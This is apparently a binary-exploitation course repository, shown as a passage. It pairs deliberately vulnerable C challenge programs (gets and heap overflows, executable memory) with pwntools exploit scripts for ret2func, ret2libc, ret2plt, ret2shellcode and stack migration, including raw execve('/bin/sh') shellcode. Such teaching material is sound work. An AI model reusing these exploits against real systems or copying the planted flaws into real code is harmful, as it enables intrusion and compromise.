| init(); 22 | 23 | printf("Hello~\n"); 24 | printf("give me your msg: \n"); 25 | 26 | msg = malloc(40); 27 | info = malloc(sizeof(Info)); 28 | 29 | strcpy(info->name, "User"); 30 | info->privilege = 2; 31 | info->msg = msg; 32 | 33 | read(0, msg, 0x40); 34 | 35 | printf("Checking privilege...\n"); 36 | if (info->privilege == 1) { 37 | printf("Hello Admin %s\n", info->name); 38 | } else { 39 | printf("Your privilege is too low QQ, Bye %s\n", info->name); 40 | } 41 | 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /heap_overflow/challenge/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | r=process('./chal') 3 | 4 | payload=b'a'*0x30+b'NAUP\0\0\0\0'+p64(1) 5 | 6 | r.sendline(payload) 7 | 8 | r.interactive() 9 | -------------------------------------------------------------------------------- /ret2func/challenge/.gdb_history: -------------------------------------------------------------------------------- 1 | p shell 2 | q 3 | -------------------------------------------------------------------------------- /ret2func/challenge/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/ret2func/challenge/chal -------------------------------------------------------------------------------- /ret2func/challenge/chal.c: -------------------------------------------------------------------------------- 1 | #include 2 | int shell(){ 3 | system("/bin/sh"); 4 | } 5 | 6 | int main(){ 7 | char buffer[8]; 8 | gets(buffer); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /ret2func/challenge/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process('./chal') 4 | 5 | r.sendline(b'a' * (0x8 + 0x8) + p64(0x401156+0x5)) 6 | 7 | r.interactive() 8 | -------------------------------------------------------------------------------- /ret2libc/challenge/.gdb_history: -------------------------------------------------------------------------------- 1 | b main 2 | q 3 | b main 4 | r 5 | ni 6 | stack 7 | q 8 | fin 9 | vmmap 10 | q 11 | b main 12 | r 13 | vmmap 14 | x/10xg 0x404550 15 | q 16 | fin 17 | ni 18 | x/10xg 0x404550 19 | q 20 | fin 21 | ni 22 | fin 23 | ni 24 | c 25 | q 26 | fin 27 | ni 28 | q 29 | fin 30 | ni 31 | q 32 | fin 33 | ni 34 | ni 35 | q 36 | y 37 | y 38 | c 39 | q 40 | -------------------------------------------------------------------------------- /ret2libc/challenge/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/ret2libc/challenge/chal -------------------------------------------------------------------------------- /ret2libc/challenge/chal.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // gcc chal.c -o chal -fno-stack-protector -no-pie 6 | 7 | void gadget() { 8 | __asm__( 9 | "pop %rdi;" 10 | "ret;" 11 | ); 12 | } 13 | 14 | int main(){ 15 | 16 | char buffer[0x30]; 17 | printf("GIFT: %p \n>", &printf); 18 | gets(buffer); 19 | 20 | return 0; 21 | } 22 | -------------------------------------------------------------------------------- /ret2libc/challenge/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process("./chal") 4 | 5 | debug = input("(Y/N)") 6 | if debug == "Y" or debug == "y": 7 | context.log_level = 'debug' 8 | context.terminal = ['tmux', 'splitw', '-h'] 9 | gdb.attach(r) 10 | 11 | r.recvuntil(b'GIFT: ') 12 | 13 | leaklibc = int(r.recvline().strip(),16) 14 | offset = 0x606f0 15 | libcbase = leaklibc - offset 16 | 17 | ''' 18 | 0x000000000040114e : pop rdi ; ret 19 | 1481: 0000000000050d70 45 FUNC WEAK DEFAULT 15 system@@GLIBC_2.2.5 20 | 1d8678 /bin/sh 21 | ''' 22 | 23 | pop_rdi_ret = 0x40114e 24 | libc_system = libcbase + 0x50d70 25 | ret = pop_rdi_ret + 0x1 26 | binsh = libcbase + 0x1d8678 # strings -a -t x | grep /bin/sh 27 | 28 | ROPchain = p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(libc_system) 29 | 30 | r.sendline(b'a'*(0x30+0x8)+ROPchain) 31 | 32 | print("NAUPINFO@LEAKLIBC:",hex(leaklibc)) 33 | print("NAUPINFO@LIBCBASE:",hex(libcbase)) 34 | 35 | r.interactive() 36 | -------------------------------------------------------------------------------- /ret2libc/challenge/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/ret2libc/challenge/libc.so.6 -------------------------------------------------------------------------------- /ret2plt/challenge/.gdb_history: -------------------------------------------------------------------------------- 1 | b main 2 | r 3 | checksec 4 | disassemble main 5 | disassemble 0x401050 6 | ni 7 | si 8 | q 9 | plt 10 | plt 11 | disassemble main 12 | q 13 | plt 14 | disassemble main 15 | q 16 | disassemble main 17 | q 18 | disassemble main 19 | q 20 | b main 21 | r 22 | vmmap 23 | x/20xg 0x4048763 24 | x/20xg 0x404000 25 | x/20xg 0x404500 26 | q 27 | fin 28 | ni 29 | x/10xg 0x404500 30 | ni 31 | c 32 | q 33 | fin 34 | q 35 | -------------------------------------------------------------------------------- /ret2plt/challenge/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/ret2plt/challenge/chal -------------------------------------------------------------------------------- /ret2plt/challenge/chal.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // gcc chal.c -o chal -fno-stack-protector -no-pie 6 | 7 | void gadget() { 8 | __asm__( 9 | "pop %rdi;" 10 | "ret;" 11 | ); 12 | } 13 | 14 | int main() { 15 | char buffer[8]; 16 | system("echo ret2plt!"); 17 | 18 | gets(buffer); 19 | 20 | return 0; 21 | } 22 | -------------------------------------------------------------------------------- /ret2plt/challenge/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process("./chal") 4 | 5 | ''' 6 | 0x0000000000401179 <+22>: call 0x401050 7 | 0x000000000040118a <+39>: call 0x401060 8 | 0x000000000040115e : pop rdi ; ret 9 | ''' 10 | 11 | #context.log_level = 'debug' 12 | #context.terminal = ['tmux', 'splitw', '-h'] 13 | #gdb.attach(r) 14 | 15 | system_plt = 0x401050 16 | gets_plt = 0x401060 17 | pop_rdi = 0x40115e 18 | binsh = 0x404500 19 | 20 | ROPchain = b'a'*(0x8 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(gets_plt) + p64(pop_rdi) + p64(binsh) + p64(system_plt) 21 | 22 | r.sendline(ROPchain) 23 | r.sendline(b'/bin/sh\x00') 24 | 25 | print('NAUPINFO@binsh: ',hex(binsh)) 26 | 27 | r.interactive() 28 | -------------------------------------------------------------------------------- /ret2shellcode/challenge/.gdb_history: -------------------------------------------------------------------------------- 1 | disassemble main 2 | q 3 | -------------------------------------------------------------------------------- /ret2shellcode/challenge/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/ret2shellcode/challenge/chal -------------------------------------------------------------------------------- /ret2shellcode/challenge/chal.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // gcc -o chal chal.c -fno-stack-protector -no-pie -z execstack 5 | 6 | char message[50]; 7 | 8 | int main() { 9 | setvbuf(stdout,0,2,0); 10 | void *mem = (void *)0x00404000; 11 | size_t size = 0x1000; 12 | mprotect(mem, size, PROT_READ | PROT_WRITE | PROT_EXEC); 13 | 14 | 15 | puts("> "); 16 | read(0, message, 50); 17 | 18 | puts("> "); 19 | char buffer[100]; 20 | gets(buffer); 21 | return 0; 22 | } 23 | -------------------------------------------------------------------------------- /ret2shellcode/challenge/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process('./chal') 4 | 5 | shellcode = '\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05' 6 | 7 | r.sendline(shellcode) 8 | 9 | r.sendline(b'a'*136 + p64(0x404080)) 10 | 11 | r.interactive() 12 | -------------------------------------------------------------------------------- /ret2shellcode/demo/.gdb_history: -------------------------------------------------------------------------------- 1 | b main 2 | r 3 | ni 4 | si 5 | ni 6 | q 7 | b main 8 | r 9 | vmmap 10 | disassemble main 11 | q 12 | -------------------------------------------------------------------------------- /ret2shellcode/demo/demo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/ret2shellcode/demo/demo -------------------------------------------------------------------------------- /ret2shellcode/demo/demo.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | int main() { 8 | // Shellcode: execve("/bin/sh", NULL, NULL) 9 | unsigned char shellcode[] = 10 | "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"; 11 | 12 | void *mem = mmap(NULL, sizeof(shellcode), PROT_READ | PROT_WRITE | PROT_EXEC, 13 | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 14 | if (mem == MAP_FAILED) { 15 | perror("mmap"); 16 | exit(1); 17 | } 18 | 19 | memcpy(mem, shellcode, sizeof(shellcode)); 20 | 21 | ((void(*)())mem)(); 22 | 23 | return 0; 24 | } 25 | -------------------------------------------------------------------------------- /stack_migration/challenge/.gdb_history: -------------------------------------------------------------------------------- 1 | b main 2 | r 3 | x/10xg &name 4 | disassemble main 5 | q 6 | disassemble main 7 | q 8 | -------------------------------------------------------------------------------- /stack_migration/challenge/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Naupjjin/My-Course-Binary-exploitation-challenge/7d74e4bd5bc0ac487ff09cc9e0f7f67b5c64d875/stack_migration/challenge/chal -------------------------------------------------------------------------------- /stack_migration/challenge/chal.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // gcc -fno-stack-protector -no-pie -o chal chal.c 5 | char name[0x80]; 6 | 7 | int main() 8 | { 9 | setvbuf(stdin, 0, _IONBF, 0); 10 | setvbuf(stdout, 0, _IONBF, 0); 11 | 12 | char s[0x10]; 13 | 14 | printf("Give me your name: "); 15 | read(0, name, 0x80); 16 | 17 | printf("Give me your ROP: "); 18 | read(0, s, 0x20); 19 | 20 | return 0; 21 | } 22 | -------------------------------------------------------------------------------- /stack_migration/challenge/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | context.arch='amd64' 3 | 4 | a=input('open debug?') 5 | if a=='y': 6 | 7 | context.log_level = 'debug' 8 | context.terminal = ['tmux', 'splitw', '-h'] 9 | 10 | r=process('./chal') 11 | 12 | ROPvar={ 13 | 'pop_rax_ret':0x44fd47, 14 | 'pop_rdi_ret':0x401ebf, 15 | 'pop_rsi_ret':0x409f2e, 16 | 'pop_rdx_ret':0x485acb, 17 | 'leave_ret':0x401819, 18 | 'syscall':0x401c74 19 | } 20 | 21 | STACKvar={ 22 | 'rax_var':0x3b, 23 | 'rdi_var':0x4c7300, 24 | 'rsi_var':0, 25 | 'rdx_var':0, 26 | 'shell':b'/bin/sh\x00' 27 | } 28 | 29 | 30 | 31 | name_payload=flat(STACKvar['shell'], 32 | ROPvar['pop_rdi_ret'], 33 | STACKvar['rdi_var'], 34 | ROPvar['pop_rax_ret'], 35 | STACKvar['rax_var'], 36 | ROPvar['pop_rsi_ret'], 37 | STACKvar['rsi_var'], 38 | ROPvar['pop_rdx_ret'], 39 | STACKvar['rdx_var'], 0, 40 | ROPvar['syscall'] 41 | 42 | ) 43 | 44 | s_payload=b'a'*0x10+p64(0x4c7300)+p64(ROPvar['leave_ret']) 45 | r.sendlineafter(b'Give me your name: ',name_payload) 46 | r.sendlineafter(b'Give me your ROP: ',s_payload) 47 | 48 | 49 | r.interactive() 50 | --------------------------------------------------------------------------------